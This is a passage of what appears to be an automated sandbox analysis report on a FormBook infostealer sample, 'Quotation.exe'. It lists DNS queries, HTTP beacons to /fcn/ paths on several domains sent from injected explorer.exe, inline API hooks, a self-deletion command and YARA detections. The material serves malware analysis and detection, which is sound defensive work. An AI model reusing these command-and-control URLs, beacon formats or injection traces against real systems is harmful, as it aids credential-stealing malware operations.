                                              Apr 8, 2021 13:35:44.240824938 CEST53621768.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:45.279925108 CEST5959653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:45.292360067 CEST53595968.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:46.845416069 CEST6529653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:46.858165026 CEST53652968.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:47.729898930 CEST6318353192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:47.743510962 CEST53631838.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:48.628005028 CEST6015153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:48.640609980 CEST53601518.8.8.8192.168.2.5
                                              Apr 8, 2021 13:36:00.585047007 CEST5696953192.168.2.58.8.8.8
                                              Apr 8, 2021 13:36:00.632075071 CEST53569698.8.8.8192.168.2.5
                                              Apr 8, 2021 13:36:16.275763988 CEST5516153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:36:16.288503885 CEST53551618.8.8.8192.168.2.5
                                              Apr 8, 2021 13:36:43.255197048 CEST5475753192.168.2.58.8.8.8
                                              Apr 8, 2021 13:36:43.574450970 CEST53547578.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:04.324068069 CEST4999253192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:04.464893103 CEST53499928.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:07.585866928 CEST6007553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:07.598526955 CEST53600758.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:17.565593004 CEST5501653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:17.585999012 CEST53550168.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:25.318161011 CEST6434553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:25.359328985 CEST53643458.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:32.082010031 CEST5712853192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:32.116198063 CEST53571288.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:46.001332045 CEST5479153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:46.024919987 CEST53547918.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:46.130285978 CEST5046353192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:46.142963886 CEST53504638.8.8.8192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Apr 8, 2021 13:36:43.255197048 CEST192.168.2.58.8.8.80x3a76Standard query (0)www.xyfs360.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:04.324068069 CEST192.168.2.58.8.8.80x261fStandard query (0)www.riceandginger.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:25.318161011 CEST192.168.2.58.8.8.80x10daStandard query (0)www.houseof2.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.001332045 CEST192.168.2.58.8.8.80x7e6eStandard query (0)www.clickqrcoaster.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Apr 8, 2021 13:36:43.574450970 CEST8.8.8.8192.168.2.50x3a76No error (0)www.xyfs360.com156.235.228.19A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:04.464893103 CEST8.8.8.8192.168.2.50x261fNo error (0)www.riceandginger.comriceandginger.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 13:37:04.464893103 CEST8.8.8.8192.168.2.50x261fNo error (0)riceandginger.com162.241.24.122A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:25.359328985 CEST8.8.8.8192.168.2.50x10daNo error (0)www.houseof2.comhouseof2.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 13:37:25.359328985 CEST8.8.8.8192.168.2.50x10daNo error (0)houseof2.com34.102.136.180A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)www.clickqrcoaster.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.xyfs360.com
                                              • www.riceandginger.com
                                              • www.houseof2.com
                                              • www.clickqrcoaster.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.549716156.235.228.1980C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:36:43.849073887 CEST1175OUTGET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG HTTP/1.1
                                              Host: www.xyfs360.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 8, 2021 13:36:44.111809969 CEST1176INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 08 Apr 2021 11:36:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/5.6.30
                                              Data Raw: 36 36 30 0d 0a 20 20 20 0a 20 20 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 0a 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 47 72 61 79 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 70 6f 70 20 7b 20 77 69 64 74 68 3a 33 36 30 70 78 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 31 30 30 70 78 3b 20 6c 65 66 74 3a 35 30 25 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 38 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 38 70 78 20 30 20 31 36 70 78 20 30 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 70 6f 70 5f 68 65 61 64 65 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 6f 66 66 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 3b 20 77 69 64 74 68 3a 32 32 35 70 78 3b 20 68 65 69 67 68 74 3a 35 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 70 6f 70 5f 73 65 70 20 7b 20 77 69 64 74 68 3a 37 35 25 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 67 72 61 79 3b 20 6d 61 72 67 69 6e 3a 38 70 78 20 30 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 63 6f 6e 74 65 6e 74 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 30 30 30 30 3b 20 6d 61 72 67 69 6e 3a 30 20 32 34 70 78 3b 20 70 61 64 64 69 6e 67 3a 38 70 78 20 30 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 70 61 67 65 73 2f 45 78 70 69 72 65 64 2e 61 73 70 78 22 20 69 64 3d 22 66 6f 72 6d 31 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 70 4e 65 74 48 69 64 64 65 6e 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 22 20 69 64 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 22 20 76 61 6c 75 65 3d 22 6b 6e 67 65 41 68 44 70 7a 68 33 51 41 36 48 2b 53 4f 4b 49 48 48 76 38 31 49 4c 46 37 2f 33 54 33 5a 2b 62 76 65 61 52 4d 79 46 4e 43 38 36 51 56 32 30 7a 48 46 39 6a 52 49 34 6a 30 65 76 6b 2f 35 73 67 53 6b 42 57 45 69 44 52 41 52 41 47 31 2f 6b 30 66 43 66 76 57 47 54 66 46 33 33 71 63 52 32 47 58 6c 2f 4f 52 44 6f 3d 22 20 2f 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 70 4e 65 74 48 69 64 64 65 6e 22 3e 0a 0a 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 47 45 4e 45 52 41 54 4f 52 22 20 69 64 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 47 45 4e 45 52 41 54 4f 52 22 20 76 61 6c 75 65 3d 22 30 36 44 32 34 33 31 46 22 20 2f 3e 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 78 70 5f 70 6f 70 22 20 3e 0a 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 78 70 5f 70 6f
                                              Data Ascii: 660 <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><style type="text/css"> body { background-color: Gray; } .exp_pop { width:360px; min-height:200px; background-color: #FFF; border-radius:10px; position:absolute; top:100px; left:50%; margin-left: -180px; padding: 8px 0 16px 0; } .exp_pop_header { background: url(http://www.namebrightstatic.com/images/logo_off.gif) no-repeat; width:225px; height:57px; margin-top:8px; } .exp_pop_sep { width:75%; border-top:1px solid gray; margin:8px 0; } .exp_content { font-size:20px; color: #FF0000; margin:0 24px; padding:8px 0; }</style></head><body> <form method="post" action="pages/Expired.aspx" id="form1"><div class="aspNetHidden"><input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="kngeAhDpzh3QA6H+SOKIHHv81ILF7/3T3Z+bveaRMyFNC86QV20zHF9jRI4j0evk/5sgSkBWEiDRARAG1/k0fCfvWGTfF33qcR2GXl/ORDo=" /></div><div class="aspNetHidden"><input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="06D2431F" /></div> <div> <div class="exp_pop" > <center> <div class="exp_po


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.549717162.241.24.12280C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:37:04.612040997 CEST1177OUTGET /fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo HTTP/1.1
                                              Host: www.riceandginger.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 8, 2021 13:37:06.178244114 CEST1178INHTTP/1.1 301 Moved Permanently
                                              Date: Thu, 08 Apr 2021 11:37:06 GMT
                                              Server: nginx/1.19.5
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Location: http://riceandginger.com/fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo
                                              host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                              X-Endurance-Cache-Level: 2
                                              X-Server-Cache: true
                                              X-Proxy-Cache: MISS


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:37:25.374999046 CEST5035OUTGET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V HTTP/1.1
                                              Host: www.houseof2.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 8, 2021 13:37:25.585047960 CEST5036INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Thu, 08 Apr 2021 11:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "606eb0b7-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.549729198.54.117.21680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:37:46.323564053 CEST5086OUTGET /fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo HTTP/1.1
                                              Host: www.clickqrcoaster.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:13:35:44
                                              Start date:08/04/2021
                                              Path:C:\Users\user\Desktop\Quotation.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Quotation.exe'
                                              Imagebase:0x400000
                                              File size:228099 bytes
                                              MD5 hash:1F86CAAA19912CEB55C9F6121EB692BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:13:35:45
                                              Start date:08/04/2021
                                              Path:C:\Users\user\Desktop\Quotation.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Quotation.exe'
                                              Imagebase:0x400000
                                              File size:228099 bytes
                                              MD5 hash:1F86CAAA19912CEB55C9F6121EB692BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:13:35:49
                                              Start date:08/04/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff693d90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:13:36:03
                                              Start date:08/04/2021
                                              Path:C:\Windows\SysWOW64\netsh.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\netsh.exe
                                              Imagebase:0x7ff797770000
                                              File size:82944 bytes
                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:13:36:08
                                              Start date:08/04/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Quotation.exe'
                                              Imagebase:0xc40000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:13:36:08
                                              Start date:08/04/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >